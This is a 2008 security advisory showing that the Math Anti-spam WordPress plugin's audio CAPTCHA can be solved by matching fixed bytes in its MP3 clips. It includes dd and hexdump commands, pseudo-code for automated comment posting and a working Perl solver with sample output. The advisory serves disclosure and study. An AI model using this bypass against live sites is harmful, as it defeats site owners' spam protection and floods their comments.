Tuesday, January 15, 2008

[NEWS] Defeating Math Antispam Protection Plugin for Wordpress

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Defeating Math Antispam Protection Plugin for Wordpress
------------------------------------------------------------------------


SUMMARY

The Math Anti-spam plugin <http://www.theblog.ca/math-anti-spam> consists
of "a simple equation you must be able to solve in order to enter comments
to a post. The equation is displayed as an image in a randomized color,
font and position". As an alternative to the image, clicking on it
downloads an audio mp3 clip that reads the equation aloud. The clip always
uses the same voice, and no random distortion or other obfuscation is
applied to it.

The following illustrates how the Math Anti-spam mechanism can be easily
subverted by performing file comparison on the audio files.

DETAILS

Though mp3 specifications are not freely distributed, a brief description
can be found here:
<http://www.mp3-tech.org/programmer/frame_header.html>

An mp3 file consists of an optional header holding ID3 tags (this is where
you find information about the clip such as the song name, artist, etc.)
followed by what are called mpeg frames.

Frames are stored sequentially, one after the other, and the information
they contain is also sequential. This means that you can start playing an
mpeg file before reading its entire contents, as the information in the
first frame is followed by that in the second, and so on. It also means
that frames are meaningful on their own: you can strip some frames from a
file and play them independently.

Typically, all the frame headers in a file are the same. Following the
description at the above URL, the frame headers found in the mp3 files
generated by the plugin decode as follows:

FF F3 44 C4 : 1111 1111 1111 0011 0100 0100 1100 0100 (This string
happens to be D in ASCII. Feel the force, geek! :-))

1111 1111 111: Frame sync (all bits must be set)
10: MPEG Version 2 (ISO/IEC 13818-3)
01: Layer III
1: Not protected
0100: 32 kbps Bitrate index
01: 24000 Hz Sampling rate frequency index
0: frame is not padded
0: Private bit. This one is only informative.
11: Single channel (Mono)
00: Intensity stereo Off, MS stereo Off
0: Audio is not copyrighted
1: Original media
00: Emphasis none
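
The field breakdown above can be reproduced with a few shifts and masks. The following is a minimal Python sketch, not part of the original advisory; the function name decode_v2_l3_header and the lookup tables are illustrative, and the tables only cover the MPEG Version 2, Layer III case seen in these clips.

```python
# Lookup tables for the single case decoded here: MPEG Version 2, Layer III.
# Index 0 of the bitrate table means "free format" and index 15 is invalid.
V2_L3_BITRATES_KBPS = (None, 8, 16, 24, 32, 40, 48, 56, 64,
                       80, 96, 112, 128, 144, 160, None)
V2_SAMPLE_RATES_HZ = (22050, 24000, 16000, None)
CHANNEL_MODES = ("Stereo", "Joint stereo", "Dual channel",
                 "Single channel (Mono)")


def decode_v2_l3_header(header: bytes) -> dict:
    """Split a 4-byte MPEG Version 2 / Layer III frame header into fields."""
    if len(header) != 4:
        raise ValueError("a frame header is exactly 4 bytes")
    word = int.from_bytes(header, "big")
    if word >> 21 != 0x7FF:
        raise ValueError("frame sync bits are not all set")
    if (word >> 19) & 0b11 != 0b10 or (word >> 17) & 0b11 != 0b01:
        raise ValueError("this sketch only handles MPEG Version 2, Layer III")
    return {
        "crc_protected": (word >> 16) & 1 == 0,  # bit set means NOT protected
        "bitrate_kbps": V2_L3_BITRATES_KBPS[(word >> 12) & 0b1111],
        "sample_rate_hz": V2_SAMPLE_RATES_HZ[(word >> 10) & 0b11],
        "padded": bool((word >> 9) & 1),
        "private": (word >> 8) & 1,
        "channel_mode": CHANNEL_MODES[(word >> 6) & 0b11],
        "mode_extension": (word >> 4) & 0b11,
        "copyrighted": bool((word >> 3) & 1),
        "original": bool((word >> 2) & 1),
        "emphasis": word & 0b11,
    }


fields = decode_v2_l3_header(bytes.fromhex("fff344c4"))
print(fields)
```

For FF F3 44 C4 this yields 32 kbps, 24000 Hz, mono, not padded, not copyrighted, original media, which agrees with the list above.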

Comparing files with equations "1+4" and "1+5", you can see that:

- Both have their first frame starting at byte 0x00, with no ID3 tags.

- Both have 192-byte frames (including the header) until byte 0x0f60,
where a 51-byte frame is found. At byte 0x0f8f the frames are 192 bytes
long again until byte 0x2c0f, where a 132-byte frame is found. At byte
0x2c54 the frames are 192 bytes long again until the contents seem to end
(with a last, smaller frame at the end).

- Both have exactly the same contents up to byte 0x2c62. The frame
containing this position starts at 0x2c54.

Jose would bet that the contents from 0x0000 to 0x0f8e hold the spoken
word "1", from 0x0f8f to 0x2c53 the spoken word "+", and from 0x2c54 on
the spoken words "4" and "5" (one for each file).

Let's take a quick look at a "6+6" sample:

- No ID3 tag information; the first frame starts at byte 0x00.

- Frames are 192 bytes long until position 0x1320, where a 53-byte frame
exists. I would say that this marks the end of the spoken word "6".

- At 0x1355, 192-byte frames start again until 0x2fd5, where there is a
133-byte frame. Maybe the spoken word "+"?

- At 0x301a the frames are 192 bytes long again until the contents seem to
end (with a last, smaller frame at the end). Could this be another spoken
word "6"?

Would you be surprised if 0x0f8f to 0x2c53 (7365 bytes) from the "1+4" or
"1+5" equations (which we know are the same) had the same contents as
0x1355 to 0x3019 (7365 bytes) from the "6+6" equation? The spoken word
"+", maybe?

And what about 0x0000 to 0x1354 (4949 bytes) being the same as 0x301a to
0x436e (4949 bytes), both from the "6+6" file and holding the spoken word
"6"?
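
The comparisons described above boil down to two operations: finding how many leading bytes two files share, and checking whether a byte range in one file equals a range in another. Here is a minimal Python sketch of both, not part of the original advisory. The helper names are illustrative, and the demo uses synthetic stand-in data (filler bytes with the clip sizes reported in this advisory) rather than the real audio.

```python
def common_prefix_length(a: bytes, b: bytes) -> int:
    """Return the number of leading bytes that a and b share."""
    limit = min(len(a), len(b))
    for offset in range(limit):
        if a[offset] != b[offset]:
            return offset
    return limit


def same_range(a: bytes, a_start: int, b: bytes, b_start: int,
               length: int) -> bool:
    """Check whether `length` bytes at a_start in a equal those at b_start in b."""
    chunk_a = a[a_start:a_start + length]
    chunk_b = b[b_start:b_start + length]
    return len(chunk_a) == length and chunk_a == chunk_b


# Synthetic stand-ins: only the lengths and the first 16 bytes of the digit
# clips are modeled on the advisory, the rest is filler.
head = bytes.fromhex("fff344c4000000025b2140000000")  # 14 shared bytes
one = b"\x11" * 3983
plus = b"\x22" * 7365
four = head + bytes.fromhex("0205") + b"\x44" * (4595 - 16)
five = head + bytes.fromhex("0847") + b"\x55" * (5389 - 16)

one_plus_four = one + plus + four
one_plus_five = one + plus + five

print(hex(common_prefix_length(one_plus_four, one_plus_five)))
print(same_range(one_plus_four, 0x0f8f, one_plus_five, 0x0f8f, 7365))
```

With real clips, the same two helpers would be run on files read with open(path, "rb").read().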

The next step is to download the plugin
(<http://www.theblog.ca/math-anti-spam>), navigate to the directory
math-anti-spam/sounds and get all the audio clips for the numbers 0, 1,
2, ..., 9 and the plus sign.

If we had not had access to those files, we could still have obtained the
numbers by downloading enough samples to cover all of them, saving the
audio clips with descriptive filenames and splitting out the digits by
dumping the contents into different files:

$ dd if=onePlusFour.mp3 of=one.mp3 bs=1 count=3983
$ dd if=ninePlusTwo.mp3 of=two.mp3 bs=1 skip=12374
...

Now, what is the minimum amount of information needed to tell the sounds
apart?

$ for i in `ls -l|awk '{print $9}'`; do echo $i; hexdump $i |head -1; done
0.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0045
1.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 00c5
2.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0485
3.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 4309
4.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0205
5.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0847
6.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0009 0601
7.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0644
8.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0405
9.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0031
plus.mp3
0000000 fff3 44c4 0000 0002 5b21 4000 0000 0a45

It seems that bytes 14 and 15 (starting the count at 0) are always
different for each sound.
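
That observation can be checked mechanically. The following Python sketch, not part of the original advisory, searches the first 16 bytes of every clip for the lowest offset at which a window of a given width is unique per clip. The byte values are transcribed from the hexdump output above, assuming the dump shows the bytes in file order; the function name is illustrative.

```python
def first_distinguishing_offset(clips, width=2, limit=16):
    """Return the lowest offset where `width` bytes differ between all clips,
    or None if no such window exists within the first `limit` bytes."""
    for offset in range(limit - width + 1):
        windows = {data[offset:offset + width] for data in clips.values()}
        if len(windows) == len(clips):
            return offset
    return None


# Bytes 0 to 11 are identical in every clip; bytes 12 to 15 follow.
PREFIX = "fff344c4000000025b214000"
TAILS = {
    "0": "00000045", "1": "000000c5", "2": "00000485", "3": "00004309",
    "4": "00000205", "5": "00000847", "6": "00090601", "7": "00000644",
    "8": "00000405", "9": "00000031", "plus": "00000a45",
}
clips = {name: bytes.fromhex(PREFIX + tail) for name, tail in TAILS.items()}

print(first_distinguishing_offset(clips, width=2))
print(first_distinguishing_offset(clips, width=1))
```

On this data no single byte is enough to tell all eleven clips apart (byte 15 is 0x45 for both 0.mp3 and plus.mp3, and 0x05 for both 4.mp3 and 8.mp3), while the two-byte window at offset 14 is unique for each clip.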

What do you think about this pseudo-code:

1) Ask the user for the URL of the WordPress post protected by Math
Anti-spam
2) Crawl the XHTML contents for the link to the audio clip (look for
audioselect=ID)
3) Get the mp3 clip (word.mp3)
4) Check bytes 14 and 15 of the clip to see which number matches (0 to 9)
5) Skip past the first number and the plus sign: the second number starts
at offset (size of the matching number clip + size of the plus clip)
6) Check bytes 14 and 15 from the step 5 offset to see which number
matches (0 to 9)
7) eval() the equation 'result from step 4' + 'result from step 6'
8) Post the comment with the eval()uated equation result.

And the size of the clips is something that we already know:

$ ls -l math-anti-spam/sounds/
total 160
-rw-r--r-- 1 palako palako 4045 Aug 6 13:30 0.mp3
-rw-r--r-- 1 palako palako 3983 Aug 6 13:30 1.mp3
-rw-r--r-- 1 palako palako 4431 Aug 6 13:30 2.mp3
-rw-r--r-- 1 palako palako 4250 Aug 6 13:30 3.mp3
-rw-r--r-- 1 palako palako 4595 Aug 6 13:30 4.mp3
-rw-r--r-- 1 palako palako 5389 Aug 6 13:30 5.mp3
-rw-r--r-- 1 palako palako 4949 Aug 6 13:30 6.mp3
-rw-r--r-- 1 palako palako 4436 Aug 6 13:30 7.mp3
-rw-r--r-- 1 palako palako 4584 Aug 6 13:30 8.mp3
-rw-r--r-- 1 palako palako 5009 Aug 6 13:30 9.mp3
-rw-r--r-- 1 palako palako 7365 Aug 28 21:54 plus.mp3
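
With these sizes, the offsets used in the analysis are simple sums. The short Python sketch below is not part of the original advisory. It assumes that an equation clip is a plain concatenation of a digit clip, the plus clip and a second digit clip, which is what the byte comparisons earlier suggest; the function names are illustrative.

```python
# Clip sizes in bytes, copied from the directory listing above.
DIGIT_SIZES = {0: 4045, 1: 3983, 2: 4431, 3: 4250, 4: 4595,
               5: 5389, 6: 4949, 7: 4436, 8: 4584, 9: 5009}
PLUS_SIZE = 7365
FINGERPRINT_OFFSET = 14  # bytes 14 and 15 identify a clip


def expected_clip_size(first: int, second: int) -> int:
    """Size of the clip for "first + second" under the concatenation assumption."""
    return DIGIT_SIZES[first] + PLUS_SIZE + DIGIT_SIZES[second]


def second_fingerprint_offset(first: int) -> int:
    """Absolute offset of the second operand's fingerprint bytes."""
    return DIGIT_SIZES[first] + PLUS_SIZE + FINGERPRINT_OFFSET


print(expected_clip_size(1, 4))               # total size of a "1+4" clip
print(hex(DIGIT_SIZES[1]))                    # where "+" starts in "1+4"
print(hex(DIGIT_SIZES[1] + PLUS_SIZE))        # where "4" starts in "1+4"
print(hex(second_fingerprint_offset(1)))      # first byte that can differ
```

For a first operand of 1 this gives 0x0f8f, 0x2c54 and 0x2c62, the same offsets found by comparing the "1+4" and "1+5" files.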

As a proof of concept, here is the implementation for steps 4 to 7.
Trivial implementation of the other steps is left to the reader.

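Exploit:
#!/usr/bin/perl
use strict;
use warnings;
use Fcntl qw(:seek);

# Bytes 14 and 15 of each digit clip (in hex), mapped to the digit
my %numberPrints = ("0045" => 0,
                    "00c5" => 1,
                    "0485" => 2,
                    "4309" => 3,
                    "0205" => 4,
                    "0847" => 5,
                    "0601" => 6,
                    "0644" => 7,
                    "0405" => 8,
                    "0031" => 9);

# Size in bytes of each digit clip
my %numberSizes = (0 => 4045, 1 => 3983, 2 => 4431, 3 => 4250, 4 => 4595,
                   5 => 5389, 6 => 4949, 7 => 4436, 8 => 4584, 9 => 5009);

my $PLUS_SIZE = 7365;

# Read two bytes at the current position and return them as a hex string
sub readPrint {
    my ($fh) = @_;
    my $buffer;
    my $read = sysread($fh, $buffer, 2);
    die "Short read\n" unless defined $read && $read == 2;
    return sprintf("%.2x%.2x", map { ord } split(//, $buffer));
}

die "Usage: $0 clip.mp3\n" unless @ARGV == 1;
open(my $in, '<', $ARGV[0]) or die "Cannot open $ARGV[0]: $!\n";
binmode($in);

# First operand: fingerprint at absolute offset 14
sysseek($in, 14, SEEK_SET) or die "Cannot seek: $!\n";
my $op1 = $numberPrints{readPrint($in)};
die "Unknown first operand\n" unless defined $op1;

# Second operand: we are now at offset 16, so a relative seek over the
# first clip plus the plus clip, minus 2, lands on byte 14 of the second clip
sysseek($in, $numberSizes{$op1} + $PLUS_SIZE - 2, SEEK_CUR)
    or die "Cannot seek: $!\n";
my $op2 = $numberPrints{readPrint($in)};
die "Unknown second operand\n" unless defined $op2;

print "$op1 + $op2 = " . ($op1 + $op2) . "\n";
close($in);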

Check it against some samples:

$ ls -l samples/
total 304
-rw-r--r-- 1 palako palako 15943 Jan 8 07:14 1+4.mp3
-rw-r--r-- 1 palako palako 16745 Jan 8 07:10 2+6.mp3
-rw-r--r-- 1 palako palako 16745 Jan 8 07:07 6+2.mp3
-rw-r--r-- 1 palako palako 16898 Jan 8 07:02 6+8.mp3
-rw-r--r-- 1 palako palako 16750 Jan 8 07:08 7+6.mp3
-rw-r--r-- 1 palako palako 16385 Jan 8 07:12 7+8.mp3
-rw-r--r-- 1 palako palako 16380 Jan 8 07:06 8+2.mp3
-rw-r--r-- 1 palako palako 16958 Jan 8 07:09 9+8.mp3

$ for sample in samples/*.mp3; do ./math_spam.pl "$sample"; done
1 + 4 = 5
2 + 6 = 8
6 + 2 = 8
6 + 8 = 14
7 + 6 = 13
7 + 8 = 15
8 + 2 = 10
9 + 8 = 17


ADDITIONAL INFORMATION

The information has been provided by <mailto:josem.palazon@gmail.com>
Jose Palazon (a.k.a. palako).
The original article can be found at:
<http://docs.google.com/View?docid=df36cd52_19xzmkwqcg>
